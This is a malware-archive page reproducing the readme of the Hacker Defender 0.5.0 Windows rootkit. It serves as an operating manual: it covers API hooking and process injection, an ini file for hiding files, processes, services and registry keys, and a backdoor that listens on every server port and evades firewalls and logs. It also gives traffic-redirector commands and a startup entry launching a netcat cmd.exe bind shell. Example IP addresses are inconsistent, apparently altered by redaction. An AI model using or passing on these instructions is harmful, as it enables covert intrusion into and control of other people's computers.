.: Hacker defender 0.5.0 :.
Released 19 years ago. Oct 2002By Holy_Father
- From: Czechoslovakia
- Coded by: Holy_Father
- Version: Hacker defender 0.5.0
- Released date: Oct 2002, 19 years ago.
- Coded in: Delphi & Assembly
- Family: Hacker defender
- Category: Remote Access
Hacker defender v0.5.0 ====================== Main ---- Hacker defender v0.5.0 by Holy_Father Hacker defender is rootkit for Windows NT 4.0, Windows 2000 and Windows XP. Main code was written in Delphi 6. Functions for new thread are written in assembler. Backdoor and redirector clients are coded mostly in Delphi 6. program uses adapted LDE32 LDE32, Length-Disassembler Engine, 32-bit, (x) 1999-2000 Z0MBiE special edition for REVERT tool version 1.05 program uses Superfast/Supertiny Compression/Encryption library Superfast/Supertiny Compression/Encryption library. (c) 1998 by Jacky Qwerty/29A. Usage ----- >hxdef050.exe [inifile] or >hxdef050.exe [switch] Default EXENAME.ini where EXENAME is the name of executable of main program without extension is used if run without specifying the inifile or if run with switch (so default inifile is hxdef050.ini). These switches are available: -:refresh - use to update settings from inifile -:noservice - doesn't install services and run normally -:installonly - only install service, but not run Example: >hxdef050.exe -:refresh Idea ---- The Main idea of this program was to use some API functions e.g. WriteProcessMemory and CreateRemoteThread to create a new thread in all running processes. New thread will rewrite some functions in system modules (mostly kernel32.dll and advapi32.dll) and inject fake code which will check API results and change this result in specific cases. Program must be absolutely hidden for all others. Now the user is able to hide files, process, system services, registry keys. Program installs hidden backdoors and register as hidden system service. The technology of backdoor allowed to do the implantation of redirector. Licence ------- Till version 1.0.0 it is freeware. It can be spread but not changed and all copies must includes all files (including original readme files). Only exception is when target person (and computer owner) wouldn't know about the copy. This project will be open source in version 1.0.0. Version ------- TODO - file manager based on backdoor technology - unify backdooru, redirector and file manager in one program - hide symbolic link objects - fix bug with MSTS ? running root process on system level 0.5.0 + low level redir based on backdoor technique + password protection + name of inifile depends on exefile name + backdoor stability improved - redirectors conection speed is limited about 256 kBps, imperfect implementation of redirector, imperfect design of redirector - found chance to detect rootkit with symbolic link objects - found bug in connection with MS Termnial Services - found bug in hidding files in 16-bit applications x found and fixed bug in services enumeration x found and fixed bug in hooking servers 0.3.7 + possibility to change settings during running + wildcard in names of hidden files, process and services + possibility to add programs to rootkit startup x fixed bug in hidding services on Windows NT 4.0 0.3.3 + stability realy improved x fixed all bugs for Windows XP x found and fixed bug in hiding in registry x found and fixed bug in backdoor with more clients 0.3.0 + connectivity, stability and functionality of backdoor improved + backdoor shell runs always on system level + backdoor shell is hidden + registry keys hiding x found and fixed bug in root processes - bug in XP after reboot 0.2.6 x fixed bug in backdoor 0.2.5 + fully interactive console + backdoor identification key is now only 256 bits long + improved backdoor installation - bug in backdoor 0.2.1 + always run as service 0.2.0 + system service installation + hiding in database of installed services + hidden backdoor + no more working with windows 0.1.1 + hidden in tasklist + usage - possibility to specify name of inifile x found and then fixed bug in communication x fixed bug in using advapi - found bug with debuggers 0.1.0 + infection of system services + smaller, tidier, faster code, more stable program x fixed bug in communication 0.0.8 + hiding files + infection of new processes - can't infect system services - bug in communication Hooked API ---------- List of API functions which are changed: Kernel32.FindFirstFileExW Kernel32.FindNextFileW Kernel32.CreateProcessW Kernel32.CreateProcessInternalW Ntdll.NtQuerySystemInformation (class 5) WS2_32.recv WS2_32.WSARecv Kernel32.ReadFile Advapi32.EnumServiceGroupW Advapi32.EnumServicesStatusA Advapi32.EnumServicesStatusExW Advapi32.EnumServicesStatusExA Advapi32.RegEnumKeyW Advapi32.RegEnumKeyA Advapi32.RegEnumKeyExW Advapi32.RegEnumKeyExA Inifile ------- Again, there are more settings in this version. Inifile must contain six parts: [Hidden Table], [Root Processes], [Hidden Services], [Hidden RegKeys], [Startup Run], [Password]. In [Hidden Table], [Root Processes] and [Hidden Services] can used character * as the wildcard in place of strings end. Asterisk can be used only on strings end, everything after first asterisks is ignored. Example: [Hidden Table] hxdef* this will hide all files, sdir and processes which name start with "hxdef". Hidden Table is a list of files and directories which should be hidden. There is no chance to find those files and directories. Programs in this list will be hidden in tasklist. Root Processes is a list of programs which will be immune against infection. You can see hidden files, directories and programs only with these root programs. So, root processes are for rootkit admins. Hidden Services is a list of service names which will be hidden in the database of installed services. Service name for the main rootkit program is HackerDefender050. Hidden RegKeys is a list of registry keys which will be hidden. Rootkit has two keys in registry: HackerDefender050 and LEGACY_HACKERDEFENDER050. Startup Run is a list of programs which rootkit run after its startup. These programs will have same rights as rootkit. Program name is divided from its arguments with question tag. Do not use " characters. Example: [Startup Run] c:\sys\nc.exe?-L -p 100 -t -e cmd.exe netcat-shell is run after rootkit startup and listens on port 100 Password is 16 character string which is used when working with backdoor or redirector. Password can be shorter, rest is filled with spaces. Backdoor -------- Rootkit hooks some API functions connected with receiving packets from the net. If incoming data equals to 256 bits long key, password and service are verified, the copy of a shell named "~ --/EMAIL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--" is created in a temp, its instance is created and next incoming data are redirected to this shell. Because rootkit hooks all process in the system all TCP ports on all servers will be backdoors. This backdoor will work only on servers where incoming buffer is larger or equal to 256 bits. But this feature is on almost all standard servers like Apache, IIS, Oracle. So, backdoor is created and it is hidden because its packets go through common servers on the system. So, you are not able to find it with classic portscanner and this backdoor can easily go through firewall. Exception in this are classic proxies which are protocol oriented for e.g. FTP or HTTP. During tests on IIS services was found that HTTP server does not log any of this connection, FTP and SMTP servers log only disconnection at the end. You have to use special client if want to connect to the backdoor. Program bdcli050.exe is used for this. usage: bdcli050.exe host port Client for version 0.5.0 is not compatible with servers in older version than 0.5.0. Redirector ---------- Redirector is based on backdoor technology. First connection packets are same as in backdoor connection. Next packets are special packets for redirector only. These packets are made by redirectors base which is run on users computer. First packet of redirected connection defines target server and port. The redirectors base saves its settings into its inifile which name depends on base exefile name (so default is rdrbs050.ini). If this file doesn't exist when base is run, it is created automatically. It is better not to modify this inifile externaly. All settings can be changed from base console. If we want to use redirector on server where rootkit is installed, we have to run redirectors base on localhost before. Then in base console we have to create mapped port routed to server with rootkit. Finally we can connect on localhost base on chosen port and transfering data. Redirected data are coded with rootkit password. In this version connection speed is limited with about 2156 kBps. Redirector is not determined to be used for hispeed connections. Redirector is also limited with system where rootkit run. Redirector works with TCP protocol. In this version the base is controled with 19 commands. These are not case sensitive. Their function is described in HELP command. During the base startup are executed commands in startup-list. Startup-list commands are edited with commands which start with SU. Redirector differentiate between two connection types (HTTP and other). If connection is other type packets are not changed. If it is HTTP type Host parametr in HTTP header is changed to the target server. Maximum redirectors count on one base is 1000. Redirector base fully works only on NT boxes. Only on NT program has tray icon and you can hide console with HIDE command. Only on NT base can be run in silent mode where it has no output, no icon and it does only commands in startup-list. Examples: 1) getting mapped port info >MPINFO No mapped ports in the list. 2) add command MPINFO to startup-list and get startup-list commands: >SUADD MPINFO >sulist 0) MPINFO 3) using of HELP command: >HELP Type HELP COMMAND for command details. Valid commands are: HELP, EXIT, CLS, SAVE, LIST, OPEN, CLOSE, HIDE, MPINFO, ADD, DEL, DETAIL, SULIST, SUADD, SUDEL, SILENT, EDIT, SUEDIT, TEST >HELP ADD Create mapped port. You have to specify domain when using HTTP type. usage: ADD <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET SERVER PORT> <PASSWORD> [TYPE] [DOMAIN] >HELP EXIT Kill this application. Use DIS flag to discard unsaved data. usage: EXIT [DIS] 4) add mapped port, we want to listen on localhost on port 100, rootkit is installed on server 22.214.171.124 on port 80, target server is --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- on port 80, rootkits password is bIgpWd, connection type is HTTP, ip address of target server (--/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--) - we always have to know its ip - is 126.96.36.199: >ADD 100 188.8.131.52 80 184.108.40.206 80 bIgpWd HTTP --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- command ADD can be run without parameters, in this case we are asked for every parameter separately 5) now we can check mapped ports again with MPINFO: >MPINFO There are 1 mapped ports in the list. Currently 0 of them open. 6) enumeration of mapped port list: >LIST 000) :100:220.127.116.11:80:18.104.22.168:80:bIgpWd:HTTP 7) datailed description of one mapped port: >DETAIL 0 Listening on port: 100 Mapping server address: 22.214.171.124 Mapping server port: 80 Target server address: 126.96.36.199 Target server port: 80 Password: bIgpWd Port type: HTTP Domain name for HTTP Host: --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- Current state: CLOSED 8) we can test whether the rootkit is installed with out password on mapping server 188.8.131.52 (but this is not needed if we are sure about it): >TEST 0 Testing 0) 184.108.40.206:80:bIgpWd - OK if test failed it returns Testing 0) 220.127.116.11:80:bIgpWd - FAILED 9) port is still closed and before we can use it, we have to open it with OPEN command, we can close port with CLOSE command when it is open, we can use flag ALL when want to apply these commands on all ports in the list, current state after required action is written after a while: >OPEN 0 Port number 0 opened. >CLOSE 0 Port number 0 closed. or >OPEN ALL Port number 0 opened. 10) to save current settings and lists we can use SAVE command, this saves all to inifile (saving is also done by command EXIT without DIS flag): >SAVE Saved successfully. Open port is all what we need for data transfer. Now you can open your favourite explorer and type --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- as url. If no problems you will see how main page on --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\-- is loaded. First packets of connection can be delayed up to 5 seconds, but others are limited only by speed of server, your internet connection speed and by redirector technology which is about 256 kBps in this version. Tests ----- Basic installation was tested without others bugs on: MS Windows XP [Verze 5.1.2600], MS Windows 2000 5.00.2195 SP2, MS Windows NT 4.0 SP6 Backdoor runs perfectly on: MS Windows XP [Verze 5.1.2600] with IIS 5.1 WWW, FTP, SMTP MS Windows 2000 5.00.2195 SP2 with IIS 5.0 WWW, FTP, SMTP - 100% MS Windows NT 4.0 SP6 with IIS 3.0 WWW Redirector was not tested yet. Redirectors base works perfectly only on NT boxes. Known Bugs ---------- Three bugs are known at the moment. 1) Processes, which are debugged at the moment, can't be infect, because their debugger has exclusive rights for them. The infection will lose if the process is debugged during infection. So, it will not be changed and see everything. I think this is not a serious bug, because there is only small chance to apply this. I need help with solving this problem. It is not serious, but i have no idea how to fix it. 2) There is not well documented bug which caused bugs in MS Terminal Services. 3) There is a chance to detect rootkit with symbol link objects. Files ----- original archive contains these files: hxdef050.exe 51 200 b - program Hacker defender v0.5.0 hxdef050.ini 1 200 b - inifile with default settings bdcli050.exe 30 208 b - backdoor client rdrbs050.exe 48 640 b - redirectors base readmecz.txt 14 890 b - czech version of help file readmeen.txt 14 728 b - this help file Holy_Father
URL's and mails were automatically redacted (filtered) for reader's safety. However the filter is not perfect and can't find all harmful elements. If you find something dangerous including file link, website, mail address, profanity... contact me immediately at firstname.lastname@example.org, thank you in advance.